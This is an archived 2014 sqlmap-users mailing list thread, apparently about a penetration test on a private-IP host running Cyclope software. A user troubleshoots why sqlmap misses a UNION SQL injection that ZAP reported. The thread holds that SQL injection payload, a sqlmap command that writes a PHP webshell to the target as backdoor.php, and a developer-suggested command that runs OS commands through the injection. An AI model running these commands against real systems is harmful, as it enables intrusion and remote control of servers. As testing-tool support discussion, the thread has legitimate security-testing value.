Re: [sqlmap-users] File Write Error
Brought to you by:
inquisb
From: Brandon P. <bpe...@gm...> - 2014-03-21 18:16:25
|
Brian, I expect the program is taking the input for username and truncating it, so ZAP sees the injection going in and a successful auth afterwards and assumes the payload worked. I think this is a poor assumption to make. On Fri, Mar 21, 2014 at 1:11 PM, Miroslav Stampar < mir...@gm...> wrote: > There is always a 302 redirect, so I am not sure how ZAP detected this as > a SQLi. > > Kind regards, > Miroslav Stampar > > > On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hu...> wrote: > >> Thanks for the quick response, Miroslav and Bernardo. It's very much >> appreciated! There is a UNION technique that is being reported by ZAP, but >> sqlmap isn't finding it and I haven't quite figured out how to simply tell >> it what to use explicitly. ZAP detects a UNION vulnerability on >> activate.php: >> >> >> "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP" >> >> My attempts to input this have not been successful, so I'm not sure if >> it's a false positive or I'm not using sqlmap quite right (more likely) . >> >> CMDLINE >> sqlmap -u "http://172.16.71.138:7879/activate.php" >> --data='act=auth-login&page=login&username=admin&password=admin' -p >> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write >> /usr/share/webshells/php/simple-backdoor.php --file-dest >> progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL >> select NULL --" >> >> As for the previous method, here's the attached file (on screen output >> was massive - password is "password"). End result "[09:01:51] [CRITICAL] >> all tested parameters appear to be not injectable. Also, you can try to >> rerun by providing either a valid value for option '--string' (or >> '--regexp')" >> >> Thanks for the help! >> >> Brian >> >> >> >> On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. < >> ber...@gm...> wrote: >> >>> On 21 March 2014 11:57, Bernardo Damele A. G. <ber...@gm...> >>> wrote: >>> > [...] >>> > All in all, can you please relaunch sqlmap (make sure you run git pull >>> > first to sync to the GitHub repository) with the following syntax: >>> >>> Command line: >>> >>> python sqlmap.py -u "http://172.16.71.138:7879/index.php" >>> --data="act=auth-login&pag=login&username=admin&password=admin" -p >>> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3 >>> --parse-errors -t traffic.log --answers "language does the web server >>> support=4,do you want to use for writable=2,comma separate list of >>> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y" >>> >>> Feel free to report back the result, the entire standard output of >>> sqlmap and send me the traffic.log. >>> >>> Thank you. >>> Bernardo >>> >> >> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and their >> applications. Written by three acclaimed leaders in the field, >> this first edition is now available. Download your free book today! >> http://p.sf.net/sfu/13534_NeoTech >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |